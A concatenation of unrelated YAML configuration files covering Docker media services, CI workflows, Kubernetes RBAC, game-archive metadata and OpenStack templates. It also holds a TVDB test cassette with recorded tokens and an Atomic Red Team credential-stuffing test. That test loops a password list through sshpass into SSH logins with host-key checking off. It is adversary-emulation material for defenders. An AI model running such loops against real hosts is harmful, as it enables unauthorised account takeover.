- '/mnt/data/rutorrent/downloads:/downloads'
sonarr:
container_name: 'sonarr'
image: linuxserver/sonarr:latest
restart: always
depends_on:
- media
- rutorrent
ports:
- '8989:8989'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
volumes:
- '/mnt/data/sonarr/config:/config'
- '/mnt/data/media/unionfs:/unionfs:shared'
- '/mnt/data/rutorrent/downloads:/downloads'
radarr:
container_name: 'radarr'
image: linuxserver/radarr:latest
restart: always
depends_on:
- media
- rutorrent
ports:
- '7878:7878'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
volumes:
- '/mnt/data/radarr/config:/config'
- '/mnt/data/media/unionfs:/unionfs:shared'
- '/mnt/data/rutorrent/downloads:/downloads'
# Torrent indexer proxy used by sonarr/radarr.
jackett:
# NOTE(review): container_name is 'jacket' (single t) while the service key
# and image are 'jackett' — looks like a typo, but renaming the container
# is behavior-affecting; confirm nothing references 'jacket' before fixing.
container_name: 'jacket'
image: linuxserver/jackett:latest
restart: always
ports:
- '9117:9117'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
volumes:
- '/mnt/data/jackett/config:/config'
- '/mnt/data/jackett/blackhole:/downloads'
plex:
container_name: 'plex'
image: linuxserver/plex:latest
restart: always
depends_on:
- media
ports:
- '32400:32400'
- '32400:32400/udp'
- '32469:32469'
- '32469:32469/udp'
- '5353:5353/udp'
- '1900:1900/udp'
environment:
PUID: 1000
PGID: 1000
TZ: 'Europe/Copenhagen'
VERSION: 'latest'
volumes:
- '/mnt/data/plex/config:/config'
- '/mnt/data/media/unionfs:/unionfs:shared'
- '/mnt/data/plex/transcode:/transcode'
network_mode: 'host'
|
docker-compose.yml
|
interactions:
- request:
body: '{"username": null, "password": <PASSWORD>, "apikey": "2AE5D1E42E7194B9"}'
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Accept-Language: [en]
Connection: [keep-alive]
Content-Length: ['66']
Content-Type: [application/json]
User-Agent: [Subliminal/2.0]
method: POST
uri: https://api.thetvdb.com/login
response:
body:
string: !!binary |
H4sIAAAAAAAAAwTBSZKqMAAA0H2fwnJvFyio/B1DgAASmYywoZhJALEYGuFX373f+/+12+2nvile
+3+7fbEadaplBBHDCzbI2gSO8OXymQzPsHk/H7IhfBer0Ra6SBAFjE1FBvnhcvNvI+zaBtKeZKcH
SbV2SjBfpzIcYSesCc7LBKsMpP3HVsLFVkTepmArnW9x01hx9OZ8tkpauokz9Rpy5+GePNswAR+o
ROGJIgVbZw/VeiMCP4vhw61+iqUt6CJNqzyxmzqINEqBXEkgKDrHNm766tZwQTduJdKBMu/OGr13
dGJzPze50jYupqT7Fufr9wEdNyGKQYUFC0pCTUwr6uyrKJAww31eckEhxKesRfqab8DpVYvtUq8Q
jYFR2dfMS5yDG7+mqFO3s2NipYIHc1TT+bp4mna0ia6+BtOUYwwEK9yurvdRZaAISgXuXkBYD9cQ
aWBaxzzwTJSpF/0ZMunmvd48FC9KfDkinotZHZ6LrbsOs8PNbPCEPzg5Tgc7guKqDmvGsc3hHpE2
hedq//X7BwAA//8DABKqMSrbAQAA
headers:
cf-ray: [29217b33c0703bbd-CDG]
connection: [keep-alive]
content-encoding: [gzip]
content-type: [application/json]
date: ['Mon, 11 Apr 2016 21:20:13 GMT']
server: [cloudflare-nginx]
set-cookie: ['__cfduid=d1bdd673311350ca09def97d4e47630e81460409613; expires=Tue,
11-Apr-17 21:20:13 GMT; path=/; domain=.thetvdb.com; HttpOnly']
vary: [Accept-Language]
x-powered-by: [Thundar!]
x-thetvdb-api-version: [2.0.0]
status: {code: 200, message: OK}
- request:
body: null
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Accept-Language: [en]
Authorization: [!!python/unicode 'Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE0NjA0OTYwMTMsImlkIjoic3VibGltaW5hbCIsIm9yaWdfaWF0IjoxNDYwNDA5NjEzfQ.AzG1AsSuduLfjfRaQtoGORurPaXlYaExIDZY3jODWL6SOhHkAETc_IVRgvewlejwBtyCt1zFrAjZbECgBEUemQNJMHyRhIwOM4yiB-j0pmLsSpZ31dTdK4fNJ7KBHTL4THPrO2z9Z_EgW9LIB9hiKLZmN8A9iYcWodf4Ue9_3clOHydzEQoFL1mbSeAJr0F1nu5B4QWkThjOmFz6QKWDgI-KsFbu8wSGG2NiHFnrKKC_WE9LYz8RSxFCED9DgEPSUi1SWhIOGEtysdUSKOcF7HXY0bzSnp5IA7D_72O54_1HI6ezm8ruQ4u1UXIvWa2t-NZIAyFryc41k-PZilbI6g']
Connection: [keep-alive]
Content-Type: [application/json]
Cookie: [__cfduid=d1bdd673311350ca09def97d4e47630e81460409613]
User-Agent: [Subliminal/2.0]
method: GET
uri: https://api.thetvdb.com/series/80379/episodes/query?airedSeason=99&page=1
response:
body:
string: !!binary |
H4sIAAAAAAAAA6rmUlBQci0qyi9SslJQ8stXKEotLs0pKVZIyy9SqMwvLVIoLE0tqrRSyE0siA5O
TSzOz7OytFQoKUvVK04tykwt9kyxsjAwNreMVeKqBQAAAP//AwB+XqRhTQAAAA==
headers:
cache-control: ['private, max-age=300']
cf-ray: [29217b37508c3bbd-CDG]
connection: [keep-alive]
content-encoding: [gzip]
content-type: [application/json]
date: ['Mon, 11 Apr 2016 21:20:14 GMT']
server: [cloudflare-nginx]
vary: [Accept-Language]
x-powered-by: [Thundar!]
x-thetvdb-api-version: [2.0.0]
status: {code: 404, message: Not Found}
version: 1
|
tests/cassettes/tvdb/test_query_series_episodes_wrong_season.yaml
|
name: networks
desc: Neighborhood Accessibility Variables
model_type: networks
node_col: node_id
variable_definitions:
- aggregation: sum
dataframe: buildings
decay: linear
filters:
- general_type == "Retail"
name: retail_sqft_3000
radius: 3000
varname: non_residential_sqft
- aggregation: sum
dataframe: households
decay: flat
name: sum_income_3000
radius: 3000
varname: income
- name: residential_units_500
dataframe: buildings
varname: residential_units
radius: 500
apply: np.log1p
- name: residential_units_1500
dataframe: buildings
varname: residential_units
radius: 1500
apply: np.log1p
- name: office_1500
dataframe: buildings
varname: job_spaces
filters:
- general_type == "Office"
radius: 1500
apply: np.log1p
- name: retail_1500
dataframe: buildings
varname: job_spaces
filters:
- general_type == "Retail"
radius: 1500
apply: np.log1p
- name: industrial_1500
dataframe: buildings
varname: job_spaces
filters:
- general_type == "Industrial"
radius: 1500
apply: np.log1p
- name: ave_sqft_per_unit
dataframe: buildings
varname: sqft_per_unit
filters:
- general_type == "Residential"
radius: 1500
apply: np.log1p
decay: flat
aggregation: average
- name: ave_lot_size_per_unit
dataframe: buildings
varname: lot_size_per_unit
filters:
- general_type == "Residential"
radius: 1500
apply: np.log1p
decay: flat
aggregation: average
- name: population
filters:
- building_id != -1
dataframe: households
varname: persons
radius: 1500
apply: np.log1p
- name: poor
dataframe: households
filters:
- income < 40000 and building_id != -1
varname: persons
radius: 1500
apply: np.log1p
- name: renters
dataframe: households
filters:
- tenure == 2 and building_id != -1
radius: 1500
apply: np.log1p
- name: sfdu
dataframe: buildings
filters:
- building_type_id == 1
radius: 1500
apply: np.log1p
- name: ave_hhsize
dataframe: households
filters:
- building_id != -1
varname: persons
radius: 1500
aggregation: average
decay: flat
apply: np.log1p
- name: jobs_500
filters:
- building_id != -1
dataframe: jobs
radius: 500
apply: np.log1p
- name: jobs_1500
filters:
- building_id != -1
dataframe: jobs
radius: 1500
apply: np.log1p
- name: ave_income_1500
aggregation: 75pct
filters:
- building_id != -1
dataframe: households
varname: income
radius: 1500
decay: flat
apply: np.log1p
- name: ave_income_500
aggregation: median
filters:
- building_id != -1
dataframe: households
varname: income
radius: 500
decay: flat
apply: np.log1p
|
bayarea_urbansim/configs/neighborhood_vars.yaml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-19 16:57"
game: "Unreal Tournament"
name: "DM-RP-Kelvin"
author: "Jared \"FrEaKy\" Lacey"
description: "Look At Hunter's Cool Skybox!!!!!"
releaseDate: "2015-10"
attachments:
- type: "IMAGE"
name: "DM-RP-Kelvin_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/DeathMatch/R/DM-RP-Kelvin_shot_1.png"
originalFilename: "DM-RP-Kelvin.zip"
hash: "21ba34aa75395c3bfd3f8ed9ef5562a90e1249ff"
fileSize: 7740651
files:
- name: "arena.utx"
fileSize: 4839798
hash: "1e649c8384a83ac3e567f9e7e5e572a8182f24ce"
- name: "DM-RP-Kelvin.unr"
fileSize: 1835943
hash: "25f10e8972a9e8ceef2b96e3111a6bd6d0e85402"
- name: "JumpPad.u"
fileSize: 12138
hash: "e6df5a06b2b081d3a4d429d95be1d21dff09c36b"
- name: "QUAKE3c.utx"
fileSize: 1756884
hash: "24825a99bdc76cda3eb138fdf37d69e510d560f9"
- name: "comefor.umx"
fileSize: 855950
hash: "09d7491efd2b45f46320641fc5a3ba288b44560b"
- name: "richrig.utx"
fileSize: 2234223
hash: "e2115772791315c91cdf6ab99e687d2f94e5685d"
- name: "Eodan.utx"
fileSize: 5391
hash: "d2614f314dcb7b1f1c043cc0cbd8623ab20384f1"
otherFiles: 0
dependencies:
DM-RP-Kelvin.unr:
- status: "OK"
name: "QUAKE3c"
downloads:
- url: "http://medor.no-ip.org/index.php?dir=Maps/DeathMatch&file=DM-RP-Kelvin.zip"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/DeathMatch/R/DM-RP-Kelvin.zip"
main: true
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/DeathMatch/R/2/1/ba34aa/DM-RP-Kelvin.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/DeathMatch/R/2/1/ba34aa/DM-RP-Kelvin.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "DeathMatch"
title: "The Kelvin Garden's for RaTPacK"
playerCount: "6-8"
themes:
Tech: 0.5
Nali Castle: 0.4
bots: true
|
content/Unreal Tournament/Maps/DeathMatch/R/2/1/ba34aa/dm-rp-kelvin_[21ba34aa].yml
|
--- !<SKIN>
contentType: "SKIN"
firstIndex: "2018-12-26 14:51"
game: "Unreal Tournament 2004"
name: "Assassin"
author: "Unknown"
description: "None"
releaseDate: "2002-10"
attachments:
- type: "IMAGE"
name: "Assassin_shot_2.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_2.png"
- type: "IMAGE"
name: "Assassin_shot_4.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_4.png"
- type: "IMAGE"
name: "Assassin_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_1.png"
- type: "IMAGE"
name: "Assassin_shot_5.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_5.png"
- type: "IMAGE"
name: "Assassin_shot_3.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Skins/A/Assassin_shot_3.png"
originalFilename: "assassin.zip"
hash: "6a12f79664fa91587dea1a1b2e915a9aa71ac8a4"
fileSize: 1273345
files:
- name: "Assassin.upl"
fileSize: 313
hash: "366efb328c85ed826d3e4317c8bfc32d7cfe265c"
- name: "Assassin.utx"
fileSize: 2972131
hash: "5b41b649a10254a9d060445f3432a025d579ea5f"
otherFiles: 7
dependencies: {}
downloads:
- url: "https://gamefront.online/files2/service/thankyou?id=645246"
main: false
repack: false
state: "MISSING"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament%202004/Skins/A/assassin.zip"
main: true
repack: false
state: "OK"
- url: "https://gamefront.online/files2/service/thankyou?id=849267"
main: false
repack: false
state: "MISSING"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament%202004/Skins/A/6/a/12f796/assassin.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament%202004/Skins/A/6/a/12f796/assassin.zip"
main: false
repack: false
state: "OK"
deleted: false
skins:
- "Assassin"
faces: []
model: "Unknown"
teamSkins: false
|
content/Unreal Tournament 2004/Skins/A/6/a/12f796/assassin_[6a12f796].yml
|
name: Publish latest version
on:
push:
branches:
- main
paths-ignore:
- '**/package.json'
- 'lerna.json'
- '**.md'
- 'packages/example/**'
jobs:
publish:
name: Publish
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Setup node
uses: actions/setup-node@v2
with:
node-version: '14'
registry-url: 'https://registry.npmjs.org'
# Enable lerna to commit on GitHub.
# Note that this does not work with protected branch.
- name: Configure git identity
run: |
git config --global user.name 'github-actions[bot]'
        git config --global user.email 'github-actions[bot]@users.noreply.github.com'
git remote set-url origin https://x-access-token:${GITHUB_TOKEN}@github.com/$GITHUB_REPOSITORY
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Install
run: yarn --frozen-lockfile
- name: Build
run: yarn build
# zenn-editor packages does not follow semantic versioning.
# This is because anyone should use latest version which is synced with zenn.dev
- name: Bump version to latest
run: lerna version patch --yes --no-private
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Set released version to env
run: node -p -e '`RELEASED_PACKAGE_VERSION=${require("./lerna.json").version}`' >> $GITHUB_ENV
- name: Create release
uses: release-drafter/release-drafter@v5
with:
version: ${{ env.RELEASED_PACKAGE_VERSION }}
name: ${{ env.RELEASED_PACKAGE_VERSION }}
tag: ${{ env.RELEASED_PACKAGE_VERSION }}
publish: true
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
- name: Publish latest
run: 'lerna publish from-package --yes'
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      - name: Notify releases to zenn-dev/zenn
uses: peter-evans/repository-dispatch@v1
with:
repository: zenn-dev/zenn
token: ${{ secrets.PERSONAL_TOKEN }}
event-type: update-zenn-editor-packages # specify this on zenn workflows
      - name: Notify releases to zenn-dev/api-markdown-html
uses: peter-evans/repository-dispatch@v1
with:
repository: zenn-dev/api-markdown-html
token: ${{ secrets.PERSONAL_TOKEN }}
event-type: update-zenn-editor-packages # specify this on zenn workflows
- name: Checkout
uses: actions/checkout@v2
with:
ref: canary
- name: Reflect changes on main branch to canary branch.
run: |
git pull origin main
git push origin HEAD
|
.github/workflows/publish-latest.yml
|
name: Create release
on:
workflow_dispatch:
inputs:
version:
description: 'Version'
required: true
pre_release:
description: 'Is this a pre-release?'
required: true
default: 'true'
draft:
description: 'Draft?'
required: true
default: 'true'
jobs:
build:
runs-on: windows-latest
env:
Solution_Path: src/GameJoltLibrary.sln
DOTNET_NOLOGO: true
DOTNET_SKIP_FIRST_TIME_EXPERIENCE: true
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: 'recursive'
# Install the .NET Core workload
- name: Install .NET Core
uses: actions/setup-dotnet@v1
with:
dotnet-version: 6.0.x
# Add MSBuild to the PATH: https://github.com/microsoft/setup-msbuild
- name: Setup MSBuild.exe
uses: microsoft/setup-msbuild@v1.0.2
- name: Restore dependencies GameJoltLibrary
run: dotnet restore $env:Solution_Path
- name: Build GameJoltLibrary
run: dotnet build --no-restore --configuration Release $env:Solution_Path
- name: Build Playnite
run: |
ref/PlayniteRepo/build/build.ps1
    - name: pack GameJoltLibrary
run: |
ref/PlayniteRepo/build/Release/Toolbox.exe pack build/Release build/pack
- name: Upload artifact for deployment job
uses: actions/upload-artifact@v2
with:
name: gamejoltlibrary
path: build/pack
deploy:
runs-on: ubuntu-latest
needs: build
environment:
name: 'Development'
steps:
- name: Download artifact from build job
uses: actions/download-artifact@v2
with:
name: gamejoltlibrary
path: pack
- name: Automatic Releases
uses: marvinpinto/action-automatic-releases@v1.2.1
with:
repo_token: "${{ secrets.GITHUB_TOKEN }}"
automatic_release_tag: ${{ github.event.inputs.version }}
        prerelease: ${{ github.event.inputs.pre_release }}
        draft: ${{ github.event.inputs.draft }}
files: |
pack/*.pext
|
.github/workflows/create-release.yml
|
uid: "com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort.fromFrontendHttpsPort*"
fullName: "com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort<ParentT>.fromFrontendHttpsPort"
name: "fromFrontendHttpsPort"
nameWithType: "ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort<ParentT>.fromFrontendHttpsPort"
members:
- uid: "com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort.fromFrontendHttpsPort(int)"
fullName: "com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort<ParentT>.fromFrontendHttpsPort(int portNumber)"
name: "fromFrontendHttpsPort(int portNumber)"
nameWithType: "ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort<ParentT>.fromFrontendHttpsPort(int portNumber)"
summary: "Associates a new listener for the specified port number and the HTTPS protocol with this rule."
parameters:
- description: "the port number to listen to"
name: "portNumber"
type: "<xref href=\"int?alt=int&text=int\" data-throw-if-not-resolved=\"False\" />"
syntax: "public abstract ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithSslCertificate<ParentT> fromFrontendHttpsPort(int portNumber)"
returns:
description: "the next stage of the definition, or null if the specified port number is already used for a\n different protocol"
type: "<xref href=\"com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithSslCertificate?alt=com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithSslCertificate&text=WithSslCertificate\" data-throw-if-not-resolved=\"False\" /><<xref href=\"ParentT?alt=ParentT&text=ParentT\" data-throw-if-not-resolved=\"False\" />>"
type: "method"
metadata: {}
package: "com.azure.resourcemanager.network.models"
artifact: com.azure.resourcemanager:azure-resourcemanager-network:2.2.0
|
docs-ref-autogen/com.azure.resourcemanager.network.models.ApplicationGatewayRequestRoutingRule.UpdateDefinitionStages.WithFrontendPort.fromFrontendHttpsPort.yml
|
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
creationTimestamp: null
name: manager-role
rules:
- apiGroups:
- ""
resources:
- configmaps
- persistentvolumes
verbs:
- '*'
- apiGroups:
- config.openshift.io
resources:
- infrastructures
- networks
verbs:
- get
- list
- watch
- apiGroups:
- integreatly.org
resources:
- postgres
- postgressnapshots
- redis
- redissnapshots
verbs:
- list
- watch
- apiGroups:
- monitoring.coreos.com
resources:
- prometheusrules
verbs:
- '*'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
creationTimestamp: null
name: manager-role
namespace: cloud-resource-operator
rules:
- apiGroups:
- ""
resources:
- configmaps
- endpoints
- events
- persistentvolumeclaims
- pods
- pods/exec
- secrets
- services
- services/finalizers
verbs:
- '*'
- apiGroups:
- apps
resources:
- '*'
verbs:
- '*'
- apiGroups:
- cloud-resource-operator
resources:
- deployments/finalizers
verbs:
- update
- apiGroups:
- cloudcredential.openshift.io
resources:
- credentialsrequests
verbs:
- '*'
- apiGroups:
- config.openshift.io
resources:
- '*'
- authentications
- builds
- clusteroperators
- featuregates
- infrastructures
- ingresses
- networks
- schedulers
verbs:
- '*'
- apiGroups:
- integreatly
resources:
- '*'
verbs:
- '*'
- apiGroups:
- integreatly.org
resources:
- '*'
- postgres
- postgressnapshots
- redis
- redissnapshots
- smtpcredentialset
verbs:
- '*'
- apiGroups:
- integreatly.org
resources:
- blobstorages
verbs:
- create
- delete
- get
- list
- patch
- update
- watch
- apiGroups:
- integreatly.org
resources:
- blobstorages/status
verbs:
- get
- patch
- update
- apiGroups:
- monitoring.coreos.com
resources:
- prometheusrules
verbs:
- '*'
- apiGroups:
- monitoring.coreos.com
resources:
- servicemonitors
verbs:
- create
- get
- apiGroups:
- operators.coreos.com
resources:
- catalogsources
verbs:
- get
- patch
- update
|
config/rbac/role.yaml
|
### messages ###
Prefix: '&3[&6&liSpy&3] '
#------------------------------------------#
PrefixCommand: '&3[&6&lCMD-SPY&3] '
prefixBook: '&3[&6&lBOOK-SPY&3] '
PrefixSign: '&3[&6&lSIGN-SPY&3] '
PrefixAnvil: '&3[&6&lANVIL-SPY&3] '
BookOutput: '&9%player%&f: &e%text%'
#------------------------------------------#
PlayerUsedCommand: '&9%player%&f: &e%cmd%'
PlayerPlaceSign: '&9%player%&f: &e%line1% &c&l¤ &e%line2% &c&l¤ &e%line3% &c&l¤ &e%line4%'
PlayerUsedAnvil: '&c%player% &9renamed &c%item% &9to&f: &b%renamed%'
DontHavePerm: '&cYou do not have permission to execute that command.'
HelpCommands: '&7Commands: &a/ispy cmd'
HelpCommandsLabel: '&2&liSpy'
HelpInfo: '&3/ispy &7- shows iSpy info'
HelpCmd: '&3/ispy cmd &7- shows all CommandSpy commands'
HelpVersion: '&3/ispy version &7- shows CommandSpy version'
HelpReload: '&3/ispy reload &7- reloads the plugin'
HelpAllow: '&3/ispy allow &7- enable/disable log messages in chat'
ReloadPlugin: '&7Reload successful!'
# /ispy enable/disable
onEnable: ' is now enabled for you!'
onDisable: ' is now disabled for you!'
alreadyEnabled: ' is already enabled.'
alreadyDisabled: ' is already disabled.'
MessagesDisabled: '&7Logging is disabled!'
MessagesEnabled: '&7Logging is enabled!'
OnPluginEnable: '[iSpy] Enabling iSpy'
OnPluginDisable: '[iSpy] Disabling iSpy'
#------------------------------------------#
PrefixConsoleCommand: '[CMD SPY] '
PrefixConsoleSign: '[SIGN SPY] '
PrefixConsoleAnvil: '[ANVIL SPY] '
PrefixConsoleBook: '[BOOK SPY] '
#------------------------------------------#
ConsoleNoticeCmd: '%player%: %cmd%'
ConsoleNoticeBook: '%player%: %text%'
ConsoleNoticeSigns: '%player%: %line1% / %line2% / %line3% / %line4% '
ConsoleNoticeAnvils: '%player% renamed %item% to: %renamed%'
### commands which are not logged ###
HiddenCommands:
- /lag
- /msg
- /w
- /r
- /m
- /t
- /whisper
- /emsg
- /tell
- /er
- /reply
- /ereply
- /email
- /action
- /describe
- /eme
- /eaction
- /edescribe
- /etell
- /ewhisper
- /pm
- /rcmd
- /mycmd-reload all
- /plm
- /pex
- /v
- /vm
- /vr
- /vanish
- /pv
- /afp
- /af playerchat
- /schem
- //schem
- /troll
- /whitelist
- /announceconnected
- /hc
- /pgs
### things which will be logged into chat ###
LogCommands: true
LogSigns: true
LogAnvils: true
LogBooks: true
### things which will be logged into console ###
ConsoleCommands: true
ConsoleAnvils: true
ConsoleSigns: true
ConsoleBooks: true
|
iSpy/src/main/resources/config.yml
|
- set_fact:
infra_project: "{{ infra_project | default('infra') }}"
- name: Create project
command: oc {{ openshift_env.oc_admin_kubeconfig_arg }} new-project {{ infra_project }}
ignore_errors: true
- name: Install Nexus App
shell: |
oc {{ openshift_env.oc_admin_kubeconfig_arg }} new-app sonatype/nexus -n {{ infra_project }}
oc {{ openshift_env.oc_admin_kubeconfig_arg }} expose svc/nexus -n {{ infra_project }}
oc {{ openshift_env.oc_admin_kubeconfig_arg }} set probe dc/nexus -n {{ infra_project }} \
--liveness \
--failure-threshold 3 \
--initial-delay-seconds 30 \
-- echo ok
oc {{ openshift_env.oc_admin_kubeconfig_arg }} set probe dc/nexus -n {{ infra_project }} \
--readiness \
--failure-threshold 3 \
--initial-delay-seconds 30 \
--get-url=http://:8081/nexus/content/groups/public
- block:
- set_fact:
claim_name: nexus-pv
- name: Remove existing claim
command: oc {{ openshift_env.oc_admin_kubeconfig_arg }} delete pvc {{ claim_name }} -n {{ infra_project }} --ignore-not-found=true
- name: Enable persistence
shell: |
oc {{ openshift_env.oc_admin_kubeconfig_arg }} set volume dc/nexus -n {{ infra_project }} --add \
--name 'nexus-volume-1' \
--type 'pvc' \
--mount-path '/sonatype-work/' \
--claim-name '{{ claim_name }}' \
--claim-size '5G' \
--overwrite
when: persistence
- name: Get Nexus Route
shell: oc {{ openshift_env.oc_admin_kubeconfig_arg }} get route nexus -n {{ infra_project }} -o jsonpath='http://{.spec.host}/nexus'
register: nexus_address
- name: Wait till Nexus is Up
uri:
url: "{{ nexus_address.stdout }}/content/repositories/central/archetype-catalog.xml"
status_code: 200
register: result
until: result.status == 200
retries: 20
delay: 30
- name: Create JBoss Repos
uri:
url: "{{ nexus_address.stdout }}/{{ item.value.path }}"
method: POST
return_content: no
status_code: 201
user: "admin"
password: "<PASSWORD>"
body: "{{ lookup('file', role_path ~ '/files/' ~ item.value.file) }}"
body_format: json
with_dict: "{{ repos }}"
ignore_errors: true
- name: Create Groups for the Nexus repos
uri:
url: "{{ nexus_address.stdout }}/{{ item.value.path }}"
method: POST
return_content: no
status_code: 201
user: "admin"
password: "<PASSWORD>"
body: "{{ lookup('file', role_path ~ '/files/' ~ item.value.file) }}"
body_format: json
with_dict: "{{ group_repos }}"
ignore_errors: true
|
ansible/roles/install_nexus/tasks/main.yml
|
---
attack_technique: T1110.004
display_name: 'Brute Force: Credential Stuffing'
atomic_tests:
- name: SSH Credential Stuffing From Linux
auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
description: |
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
executor:
name: bash
elevation_required: false
command: |
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
- name: SSH Credential Stuffing From MacOS
auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
description: |
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- macos
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
executor:
name: bash
elevation_required: false
command: |
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
|
atomics/T1110.004/T1110.004.yaml
|
heat_template_version: queens
description: >
OpenStack Panko service configured with Puppet
parameters:
ServiceData:
default: {}
description: Dictionary packing service data
type: json
ServiceNetMap:
default: {}
description: Mapping of service_name -> network name. Typically set
via parameter_defaults in the resource registry. This
mapping overrides those in ServiceNetMapDefaults.
type: json
DefaultPasswords:
default: {}
type: json
RoleName:
default: ''
description: Role name on which the service is applied
type: string
RoleParameters:
default: {}
description: Parameters specific to the role
type: json
EndpointMap:
default: {}
description: Mapping of service endpoint -> protocol. Typically set
via parameter_defaults in the resource registry.
type: json
PankoPassword:
description: The password for the panko services.
type: string
hidden: true
Debug:
default: false
description: Set to True to enable debugging on all services.
type: boolean
PankoDebug:
default: ''
description: Set to True to enable debugging Panko services.
type: string
constraints:
- allowed_values: [ '', 'true', 'True', 'TRUE', 'false', 'False', 'FALSE']
KeystoneRegion:
type: string
default: 'regionOne'
description: Keystone region for endpoint
EnablePankoExpirer:
type: boolean
default: true
description: Enable panko expirer to periodically delete events from db
PankoExpirerMinute:
type: string
description: >
Cron to delete events data from db - Minute
default: '1'
PankoExpirerHour:
type: string
description: >
Cron to delete events data from db - Hour
default: '0'
PankoExpirerMonthday:
type: string
description: >
Cron to delete events data from db - Month Day
default: '*'
PankoExpirerMonth:
type: string
description: >
Cron to delete events data from db - Month
default: '*'
PankoExpirerWeekday:
type: string
description: >
Cron to delete events from db - Week Day
default: '*'
conditions:
service_debug_unset: {equals : [{get_param: PankoDebug}, '']}
outputs:
role_data:
description: Role data for the Panko role.
value:
service_name: panko_base
config_settings:
enable_panko_expirer: {get_param: EnablePankoExpirer}
panko::db::database_connection:
make_url:
scheme: {get_param: [EndpointMap, MysqlInternal, protocol]}
username: panko
password: {get_param: PankoPassword}
host: {get_param: [EndpointMap, MysqlInternal, host]}
path: /panko
query:
read_default_file: /etc/my.cnf.d/tripleo.cnf
read_default_group: tripleo
panko::debug:
if:
- service_debug_unset
- {get_param: Debug }
- {get_param: PankoDebug }
panko::auth::auth_url: {get_param: [EndpointMap, KeystoneInternal, uri_no_suffix] }
panko::keystone::authtoken::project_name: 'service'
panko::keystone::authtoken::user_domain_name: 'Default'
panko::keystone::authtoken::project_domain_name: 'Default'
      panko::keystone::authtoken::password: {get_param: PankoPassword}
